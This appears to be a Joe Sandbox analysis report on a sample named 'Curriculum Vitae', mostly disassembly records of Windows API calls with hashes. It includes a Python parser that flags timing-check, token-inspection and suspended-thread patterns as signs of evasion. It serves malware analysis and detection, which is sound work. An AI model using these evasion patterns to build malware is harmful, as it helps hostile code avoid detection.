                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 4d9f2dee350ec4a3ad13233fd872d4b370e4e20d175b8128e4a37501343f809f
                      • Instruction ID: 03bc655fbd8df3aa5c5a2c13cf5b4f077509a7eba8f32a739c6f0094a460a810
                      • Opcode Fuzzy Hash: 4d9f2dee350ec4a3ad13233fd872d4b370e4e20d175b8128e4a37501343f809f
                      • Instruction Fuzzy Hash: 5A110C3AD4121AFFEF11DBA5CD85FADBB78EB04750F200091E604B7290D6716E51DBA4
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00D9E1FD
                      • MessageBoxW.USER32(?,?,?,?), ref: 00D9E230
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D9E246
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D9E24D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2880819207-0
                      • Opcode ID: 54a76fb8997db48cd2d5bb307891d1cd1202686c5cd8c167e93663f5cf45e888
                      • Instruction ID: 5067afe95f1c9aa093a7236d5acb28049abfb30392218d4622efa2b900c85169
                      • Opcode Fuzzy Hash: 54a76fb8997db48cd2d5bb307891d1cd1202686c5cd8c167e93663f5cf45e888
                      • Instruction Fuzzy Hash: 74110472904359BFCB01DBE9AC09E9E7FACEB45320F184255F928E7391D6B5C90887B0
                      APIs
                      • CreateThread.KERNEL32(00000000,?,00D5CFF9,00000000,00000004,00000000), ref: 00D5D218
                      • GetLastError.KERNEL32 ref: 00D5D224
                      • __dosmaperr.LIBCMT ref: 00D5D22B
                      • ResumeThread.KERNEL32(00000000), ref: 00D5D249
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                      • String ID:
                      • API String ID: 173952441-0
                      • Opcode ID: 3f657bad3bdfc70291fd5500ae142493c7d12b7e6f5faf9accda22cb9bfd313e
                      • Instruction ID: a79b5391a5d87e1f62369b243e7d17caa46142cfa35c038efe0aa09694100789
                      • Opcode Fuzzy Hash: 3f657bad3bdfc70291fd5500ae142493c7d12b7e6f5faf9accda22cb9bfd313e
                      • Instruction Fuzzy Hash: 2201D276815305BBCF216BA6DC09FAE7A6ADF82332F240219FD25D61D0DB70C909C6B0
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D3604C
                      • GetStockObject.GDI32(00000011), ref: 00D36060
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D3606A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateMessageObjectSendStockWindow
                      • String ID:
                      • API String ID: 3970641297-0
                      • Opcode ID: a9903cb72e19a5b21be71e59e705da550397e5a8276f174f21576c28719a77b2
                      • Instruction ID: d3cbec7987fceb12b46398ce2d2d5c58a2a147ad06b4fd1ba7b7f76351d09d77
                      • Opcode Fuzzy Hash: a9903cb72e19a5b21be71e59e705da550397e5a8276f174f21576c28719a77b2
                      • Instruction Fuzzy Hash: 17116D7250160ABFEF164FA49C45EEABB69EF093A4F084215FB1892160D732DC60DBB0
                      APIs
                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00D53B56
                        • Part of subcall function 00D53AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D53AD2
                        • Part of subcall function 00D53AA3: ___AdjustPointer.LIBCMT ref: 00D53AED
                      • _UnwindNestedFrames.LIBCMT ref: 00D53B6B
                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D53B7C
                      • CallCatchBlock.LIBVCRUNTIME ref: 00D53BA4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                      • String ID:
                      • API String ID: 737400349-0
                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                      • Instruction ID: b5930c9db48c05da78defbaeca5984f761e311313fa7f354e3cf2c380d3faa19
                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                      • Instruction Fuzzy Hash: E0014C32100148BBDF125E95CC42EEB3F6DEF58799F044014FE5896121C732E965DBB0
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D313C6,00000000,00000000,?,00D6301A,00D313C6,00000000,00000000,00000000,?,00D6328B,00000006,FlsSetValue), ref: 00D630A5
                      • GetLastError.KERNEL32(?,00D6301A,00D313C6,00000000,00000000,00000000,?,00D6328B,00000006,FlsSetValue,00DD2290,FlsSetValue,00000000,00000364,?,00D62E46), ref: 00D630B1
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D6301A,00D313C6,00000000,00000000,00000000,?,00D6328B,00000006,FlsSetValue,00DD2290,FlsSetValue,00000000), ref: 00D630BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: adf679b4834bdb60b9f65137ba63e6674f67d928198c1cf6b07dcdf0f12ba21e
                      • Instruction ID: 096079aa3c56c5ba9c31b0b47894903d66ec94dd68d72b2d4112a6df1a8fa8ae
                      • Opcode Fuzzy Hash: adf679b4834bdb60b9f65137ba63e6674f67d928198c1cf6b07dcdf0f12ba21e
                      • Instruction Fuzzy Hash: 4301F732311323ABCB314F79AC44E577B98EF05BA1B140620FA09E3280C721D909C7F0
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00D9747F
                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D97497
                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D974AC
                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D974CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Type$Register$FileLoadModuleNameUser
                      • String ID:
                      • API String ID: 1352324309-0
                      • Opcode ID: 54cc4364378f68bcd4cbd59d32e4438898a0c845acf8d1c4566a75ae81d98050
                      • Instruction ID: 8f3f9af99d636e230ca132122912f87c570cc3407fb90174e8729d8f670880a7
                      • Opcode Fuzzy Hash: 54cc4364378f68bcd4cbd59d32e4438898a0c845acf8d1c4566a75ae81d98050
                      • Instruction Fuzzy Hash: 76116DB5629316ABEB208F54DC09F967BFCEF00B04F108569E65AD6192D7B0E904DBB0
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0C4
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0E9
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0F3
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B126
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: 573a963d8118556d0363e637eebcef332c21483e7f49e394c0d37a174fa63a0e
                      • Instruction ID: b20efb3dd3f4781c69992a723534bb1220d6439ef7caafd622924cb38a33515c
                      • Opcode Fuzzy Hash: 573a963d8118556d0363e637eebcef332c21483e7f49e394c0d37a174fa63a0e
                      • Instruction Fuzzy Hash: A5115E31D0172EE7CF009FE5EA68AEEBB78FF4A721F164096D945B2241CB3095508B71
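                      The record above (QueryPerformanceCounter bracketing Sleep, twice in one function) is the call pattern behind the report's "execution timing" signature, and the same record format repeats for every function the IDA plugin exported. The parser below is an added example, not Joe Sandbox's own tooling: it turns each "APIs" block into a record that keeps call-site addresses, arguments and the subcall marker, and applies a few heuristic labels. The rule set and its labels are this example's choices, not Joe Sandbox signature names; the sample input is copied from records in this report, trimmed to the lines the parser reads.

```python
"""Parse the Joe Sandbox IDA-plugin function records shown in this report and
flag API combinations worth a second look (example code, not Joe Sandbox's own)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API reference line, optionally prefixed "Part of subcall function X:",
# e.g. "• Sleep.KERNEL32(00000000,?), ref: 00D9B0E9" or "• GetCurrentThread.KERNEL32 ref: 00D91634".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<subfn>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_:]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Any other "• Key: value" line (API ID, String ID, fuzzy hashes, dump sources).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")
HEX = re.compile(r"[0-9A-Fa-f]+")

@dataclass
class ApiRef:
    name: str
    module: str
    args: List[str]            # as printed; '?' means the plugin could not resolve it
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when the call happens inside a subcall

@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def direct_api_names(self):
        return {a.name for a in self.apis if a.subcall_of is None}

    def calls_with_arg(self, name, index, value):
        """True if a direct call to `name` passes hex `value` as argument `index`."""
        return any(a.subcall_of is None and a.name == name and index < len(a.args)
                   and HEX.fullmatch(a.args[index]) and int(a.args[index], 16) == value
                   for a in self.apis)

def parse_records(text):
    """One FunctionRecord per block; a block ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw, sub = m.group("args"), m.group("subfn")
            cur.apis.append(ApiRef(m.group("name"), m.group("module"),
                                   [a.strip() for a in raw.split(",")] if raw is not None else [],
                                   int(m.group("ref"), 16), int(sub, 16) if sub else None))
            continue
        f = FIELD_LINE.match(line)
        if f:
            key = f.group("key").strip()
            cur.fields[key] = f.group("value")
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    if cur.apis or cur.fields:   # keep a truncated final record too
        records.append(cur)
    return records

def _has_all(*names):
    return lambda rec: set(names) <= rec.direct_api_names

# Heuristic labels chosen for this example; they are not Joe Sandbox signature names.
RULES = [
    ("execution timing check (QueryPerformanceCounter around Sleep)",
     _has_all("QueryPerformanceCounter", "Sleep")),
    ("token inspection (OpenThreadToken and OpenProcessToken)",
     _has_all("OpenThreadToken", "OpenProcessToken")),
    ("thread created CREATE_SUSPENDED (0x4) and resumed",
     lambda rec: _has_all("CreateThread", "ResumeThread")(rec)
     and rec.calls_with_arg("CreateThread", 4, 0x4)),
]

def flag_record(rec):
    return [label for label, pred in RULES if pred(rec)]

def flag_all(text):
    """API ID -> labels, for every record that triggers at least one rule."""
    return {r.fields.get("API ID", "?"): flag_record(r)
            for r in parse_records(text) if flag_record(r)}

# Three records copied from this report, trimmed to the lines the parser uses.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D9ACD3,?,00008000), ref: 00D9B0E9
• API ID: CounterPerformanceQuerySleep
• String ID:
• Instruction Fuzzy Hash: A5115E31D0172EE7CF009FE5EA68AEEBB78FF4A721F164096D945B2241CB3095508B71
APIs
• CreateThread.KERNEL32(00000000,?,00D5CFF9,00000000,00000004,00000000), ref: 00D5D218
• ResumeThread.KERNEL32(00000000), ref: 00D5D249
• API ID: Thread$CreateErrorLastResume__dosmaperr
• Instruction Fuzzy Hash: 2201D276815305BBCF216BA6DC09FAE7A6ADF82332F240219FD25D61D0DB70C909C6B0
APIs
  • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DA4ED4
• API ID: Connection_wcslen
• String ID: *$LPT
• Instruction Fuzzy Hash: F5914F75A012049FCB14DF58C484EAABBF1EF85304F198099E84A9F362D775EE85CBB1
"""

if __name__ == "__main__":
    for api_id, labels in flag_all(SAMPLE).items():
        print(api_id, "->", "; ".join(labels))
```

                      Running the script over the full report text instead of `SAMPLE` groups the hundreds of records by the labels they trigger. Calls listed under "Part of subcall function" are kept on the record but excluded from `direct_api_names`, so a rule fires only on the function's own calls; the `calls_with_arg` check treats the plugin's `?` placeholders as unknown rather than as a match, which is why the CREATE_SUSPENDED rule needs the flags argument to have been resolved (as it is in the CreateThread record above).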
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D92DC5
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D92DD6
                      • GetCurrentThreadId.KERNEL32 ref: 00D92DDD
                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00D92DE4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: 7e6c32f300bc121c4ed3ae6704a79f1704e74b790669f4f74488cd9af172bfa1
                      • Instruction ID: 2e14bf200ffc766376cd28dac39cc83fc1ad0dd3b9a1a3d42f9c59b288447ca5
                      • Opcode Fuzzy Hash: 7e6c32f300bc121c4ed3ae6704a79f1704e74b790669f4f74488cd9af172bfa1
                      • Instruction Fuzzy Hash: 79E092716513267BDB201BB39C0DFFB3E6CEF42BA1F041115F20AD15909AA4C841C6F0
                      APIs
                        • Part of subcall function 00D49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D49693
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496A2
                        • Part of subcall function 00D49639: BeginPath.GDI32(?), ref: 00D496B9
                        • Part of subcall function 00D49639: SelectObject.GDI32(?,00000000), ref: 00D496E2
                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DC8887
                      • LineTo.GDI32(?,?,?), ref: 00DC8894
                      • EndPath.GDI32(?), ref: 00DC88A4
                      • StrokePath.GDI32(?), ref: 00DC88B2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                      • String ID:
                      • API String ID: 1539411459-0
                      • Opcode ID: 185320c9830ea5e1c7f51b1247d7d5774c6fb3a1620083f9050e4b4e9363f2cd
                      • Instruction ID: 957dc36f89c1f5e16aa0b44a065ce3540817f58bc7e8f54a75e1638491d9084f
                      • Opcode Fuzzy Hash: 185320c9830ea5e1c7f51b1247d7d5774c6fb3a1620083f9050e4b4e9363f2cd
                      • Instruction Fuzzy Hash: DEF09A3600121BBADB125F95AC09FCA3A19AF06310F448004FB01A61E1C7751550EBF5
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00D498CC
                      • SetTextColor.GDI32(?,?), ref: 00D498D6
                      • SetBkMode.GDI32(?,00000001), ref: 00D498E9
                      • GetStockObject.GDI32(00000005), ref: 00D498F1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Color$ModeObjectStockText
                      • String ID:
                      • API String ID: 4037423528-0
                      • Opcode ID: 9052f6ff95fee1bce6d068c162123db88f498bc2302941c91dfbabed6a7da16a
                      • Instruction ID: 0908a7df67145d3dc5fc88d27df45fefc89b0623da0caf9d5543b629bde7c2a3
                      • Opcode Fuzzy Hash: 9052f6ff95fee1bce6d068c162123db88f498bc2302941c91dfbabed6a7da16a
                      • Instruction Fuzzy Hash: 42E03931654782AADB215B79AC09BE93B20AB12336F189219F7BA981E1C37186409B30
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 00D91634
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D911D9), ref: 00D9163B
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D911D9), ref: 00D91648
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D911D9), ref: 00D9164F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: a0baedd52f35a1faea1cdcbd3c4535ae0e0d001193aaf2f2dc691f7026044b3e
                      • Instruction ID: 1c0f5b6a0a25c9085fd3b7eb23fba2fc60984f128ce17d6eccae841cb772169b
                      • Opcode Fuzzy Hash: a0baedd52f35a1faea1cdcbd3c4535ae0e0d001193aaf2f2dc691f7026044b3e
                      • Instruction Fuzzy Hash: 17E04676A12313ABDB201BE0AE0DF863B68AF84792F188808F349C9080E6388441CB74
                      APIs
                      • GetDesktopWindow.USER32 ref: 00D8D858
                      • GetDC.USER32(00000000), ref: 00D8D862
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D8D882
                      • ReleaseDC.USER32(?), ref: 00D8D8A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: f5ff0ea7d799463ef41402d44aeecfc677c5c328a309226ae068b51bbf58da4e
                      • Instruction ID: 949832287928c7dacbacc3f99d45992772471b645609bb954929b3db829967ee
                      • Opcode Fuzzy Hash: f5ff0ea7d799463ef41402d44aeecfc677c5c328a309226ae068b51bbf58da4e
                      • Instruction Fuzzy Hash: C9E012B4850306DFCB419FA0D90CA6DBBB2FB08310F149005F94AE7360C7348501AF60
                      APIs
                      • GetDesktopWindow.USER32 ref: 00D8D86C
                      • GetDC.USER32(00000000), ref: 00D8D876
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D8D882
                      • ReleaseDC.USER32(?), ref: 00D8D8A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 345d3e508ededb3fbc5647f4335ee343316ce3eeb88eb6e487c0ac5b7d4461e5
                      • Instruction ID: cdac58d9c4fd77a6a6e7c80842c54bb5da2a083963648447c65bec7852a4542c
                      • Opcode Fuzzy Hash: 345d3e508ededb3fbc5647f4335ee343316ce3eeb88eb6e487c0ac5b7d4461e5
                      • Instruction Fuzzy Hash: 15E09A75850306DFCB519FA0D90CA6DBBB5FB48311F14A449FA4AE7360D7399902AF60
                      APIs
                        • Part of subcall function 00D37620: _wcslen.LIBCMT ref: 00D37625
                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DA4ED4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
